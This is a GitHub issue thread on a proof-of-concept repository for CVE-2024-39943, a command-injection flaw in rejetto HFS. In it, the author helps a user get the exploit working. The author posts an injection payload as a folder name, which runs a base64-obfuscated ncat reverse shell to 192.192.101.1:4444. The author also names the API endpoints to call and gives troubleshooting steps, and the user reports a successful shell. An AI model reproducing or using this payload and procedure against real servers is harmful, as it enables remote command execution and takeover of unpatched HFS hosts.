Failed to bypass single quotes in mkdir ''

truonghuuphuc / CVE-2024-39943-Poc

CVE-2024-39943 rejetto HFS (aka HTTP File Server) 3 before 0.52.10 on Linux, UNIX, and macOS allows OS command execution by remote authenticated users (if they have Upload permissions). This occurs because a shell is used to execute df (i.e., with execSync instead of spawnSync in child_process in Node.js).

19 stars 6 forks source link

Failed to bypass single quotes in mkdir '' #1

Closed ghost closed 3 months ago

ghost commented 3 months ago

First of all, hello, thank you very much for your POC. But there is no response when verifying through your POC Through my packet capture test, I found that the payload you provided cannot bypass the single quotes in the mkdir '' method of the ~/api/create_folder API address. The final data requested by GET is data:

[["e","ENOTDIR",null]]

data:

Hope you can test it again

truonghuuphuc commented 3 months ago

Example payload: payload: poc";python3 -c "import os;import base64;os.system(base64.b64decode('bmNhdCAxOTIuMTkyLjEwMS4xIDQ0NDQgLWUgL2Jpbi9iYXNo'))

I use endpoint ~/api/create_folder create folder with name payload It is endpoint ~/api/get_ls?path={{name folder }} => execute command df Referer: https://github1s.com/rejetto/hfs/blob/v0.52.9/src/util-os.ts#L10 Referer: https://github.com/rejetto/hfs/compare/v0.52.9...v0.52.10

Thanks

ghost commented 3 months ago

Yes, I understand what you mean and I have seen the error in the server log, such as: /bin/bash -c error: df /k '"poc;xxxxx" But I still can't bounce the shell to my vps.

I would like to confirm the following information with you:

Is the POC you uploaded consistent with the one in the video?
Is the source code of your HFS 3 the same as the hfs-linux.zip file in the github project you uploaded?
What is the version of your Linux environment? Thanks for your answer, which will help me solve the current problem. Thank you!

truonghuuphuc commented 3 months ago

Check

You should check /bin/bash exists ?
You try change /bin/bash to /bin/sh

Confirm

Is the POC you uploaded consistent with the one in the video?
- Yes
Is the source code of your HFS 3 the same as the hfs-linux.zip file in the github project you uploaded?
- Yes
What is the version of your Linux environment?
- I use docker image kalilinux/kali-rolling:latest

Poc: user admin

https://github.com/truonghuuphuc/CVE-2024-39943-Poc/assets/20487674/c9e3d7ec-9181-43b5-8230-82c36fbf8a2b

update 6/7/2024: Poc user guest

https://github.com/truonghuuphuc/CVE-2024-39943-Poc/assets/20487674/f5e0c190-419a-4017-83ab-8a303b7176a8

Note: Payload is directory name exist , If the directory does not exist, you need to send the request twice. In the video, because a directory with the name contain payload already exists on the HFS server, I only need to send the request once

https://github.com/truonghuuphuc/CVE-2024-39943-Poc/assets/20487674/8bc8c270-24a5-4ad6-b32b-a75243afcd6a

ghost commented 3 months ago

Thanks for your answer I will try again your way! thank you for your help

ghost commented 3 months ago

I reproduced successfully! thanks for your help! I cannot execute the payload at endpoint /~/api/get_ls?path= But I succeeded through the PUT method in your video! Thank you very much for helping me! Thanks!